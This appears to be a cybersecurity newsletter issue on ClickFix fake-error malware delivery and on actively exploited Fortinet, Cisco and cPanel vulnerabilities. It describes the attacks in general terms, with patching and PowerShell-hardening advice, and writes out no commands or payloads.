Fake Browser Updates Are Now a Professional Malware Delivery Business
The ClickFix technique has evolved into a sophisticated malware delivery industry — three new loader families this week alone. Plus: three critical Fortinet zero-days being actively exploited, Cisco SD-WAN compromised in the wild, and a cPanel plugin flaw added to CISA's 'must-patch' list.
Tuesday, June 16, 2026 · 5-minute read
🌐 World Intel
Researchers identified three new malware loaders — BabaDeda, Lorem Ipsum, and Potemkin — all using the ClickFix social engineering technique. ClickFix works by showing victims a realistic-looking error message on a web page, then instructing them to "fix" the error by opening a run dialog and pasting a command. The command runs a PowerShell script that silently installs malware. The appearance of three new loaders in a single week suggests ClickFix has matured into a delivery-as-a-service ecosystem where multiple criminal groups buy access to the same distribution infrastructure.
Source: The Hacker NewsCISA added CVE-2026-54420 to its Known Exploited Vulnerabilities (KEV) catalog — the official U.S. government list of flaws confirmed to be used in real attacks. The flaw is in the LiteSpeed Cache plugin for cPanel, a popular web hosting control panel. The vulnerability allows a user on a shared hosting server to escalate their privileges to root — effectively gaining control of the entire server and every other website hosted on it. On shared hosting, where hundreds of websites might run on the same machine, a single compromised account can mean a compromised host for everyone. CVSS score: 8.5.
Source: The Hacker NewsA flaw in Cisco Catalyst SD-WAN Manager — software that manages wide-area networks for enterprises — is being actively exploited. CVE-2026-20262 (CVSS 6.5) allows an attacker who has any file-write capability on the system to escalate to root, gaining full control. SD-WAN Manager is particularly sensitive: it's the central control plane that configures and manages all the network connections for an organization. Compromising it means an attacker can reconfigure traffic routing, intercept communications, or disable network segments. Cisco has released a patch.
Source: The Hacker News⚔️ Active Attacks
Fortinet's FortiSandbox product has three critical vulnerabilities under active exploitation, all rated CVSS 9.1. CVE-2026-39813 is a path traversal and authentication bypass — attackers can access files they shouldn't and skip login entirely. CVE-2026-39808 is an OS command injection requiring no authentication — send a crafted request, run any command you want on the server. CVE-2026-25089 is a second command injection flaw, patched only last week. Fortinet products have been heavily targeted by state-sponsored groups and ransomware operators for years, and this pattern of multiple simultaneous critical exploits is consistent with organized attacker campaigns that stockpile Fortinet vulnerabilities.
What you can do: If you run FortiSandbox, treat patching as a same-day emergency. Restrict FortiSandbox to internal network access only — it should never be reachable from the internet. If you cannot patch immediately, temporarily take FortiSandbox offline rather than leaving it exposed. Review logs for any unusual command execution or access from unexpected IP addresses going back 30 days.
Source: The Hacker News🔓 New Vulnerabilities
Path traversal combined with authentication bypass. Attackers can access files outside allowed directories and skip the login process entirely. Actively exploited — no authentication required to begin exploitation.
Patch immediately. Isolate from internet access if patching is delayed. This flaw is being used in active campaigns now.
Unauthenticated OS command injection — any attacker who can reach the FortiSandbox management interface can run arbitrary operating system commands. No credentials required. Remote code execution with the permissions of the FortiSandbox process.
Patch now. This is the most severe of the three FortiSandbox flaws in terms of ease of exploitation.
Privilege escalation to root on shared hosting environments running cPanel with LiteSpeed Cache. On shared hosting servers, one compromised account can mean the entire server — and all other hosted websites — are exposed. CISA added this to the KEV catalog, confirming active exploitation.
Update the LiteSpeed Cache cPanel plugin immediately. Hosting providers should push this update to all customers. If you host websites on shared hosting, contact your host to confirm whether the patch has been applied to your server.
🛠 New Tech
ClickFix attacks succeed partly because PowerShell is so capable and so poorly monitored on most Windows machines. A defensive technique that directly addresses this is called PowerShell Constrained Language Mode — a built-in Windows security feature that limits what PowerShell scripts can do, blocking the most dangerous commands that ClickFix malware depends on. Combined with Script Block Logging (another built-in Windows feature that records every PowerShell script that runs on a machine), organizations gain both prevention and detection. Both features are available in Windows 10 and 11 Pro and Enterprise, and can be configured via Group Policy at no additional cost. Many organizations simply haven't turned them on. The configuration takes about an hour for an IT professional and meaningfully raises the bar against the entire ClickFix family of attacks.
💡 Deep Dive
The technique that spawned BabaDeda, Lorem Ipsum, and Potemkin — and dozens of other malware families before them — is called ClickFix. If you haven't encountered it yet, you probably will. Understanding how it works is the best defense against it.
Here's the setup. You visit a website — it could be a hacked legitimate site, a fake document viewer, or a page you reached by clicking a link in an email. The page displays an error message. It looks exactly like a real browser or Windows error: official fonts, familiar color schemes, technical-looking text. "An error occurred while loading this page," it might say, or "Your browser needs to be updated to view this content."
Then comes the ClickFix twist. Instead of a normal "OK" button, the page gives you instructions: press the Windows key and R to open a Run dialog, then paste the text below into it and press Enter. The text below is a PowerShell command that downloads and runs malware.
Why does this work so well? Several reasons, all of them connected to how people think about computers. First, it looks authoritative. Error messages with technical text trigger a learned response in most people: this is a computer problem, I need to follow the instructions to fix it. Second, it asks the victim to do the work — which feels like fixing a problem rather than causing one. Third, the copied command goes directly into a Windows run dialog, bypassing the browser entirely. No file is downloaded. No executable appears in your Downloads folder. Nothing gets flagged by download warnings. Malware executes and the page returns to normal.
The genius and the horror of ClickFix is that it doesn't exploit a software vulnerability. It exploits a human one: the desire to fix a problem and the tendency to trust official-looking instructions. You can patch every piece of software on your machine and still fall victim to it.
The defense is behavioral. The Windows run dialog (Win+R) should never be used based on instructions from a website. No legitimate website will ever ask you to open PowerShell or the run dialog to fix a problem. If you see these instructions anywhere online, close the browser tab. That's it. There is no edge case where this is a real fix for a real problem.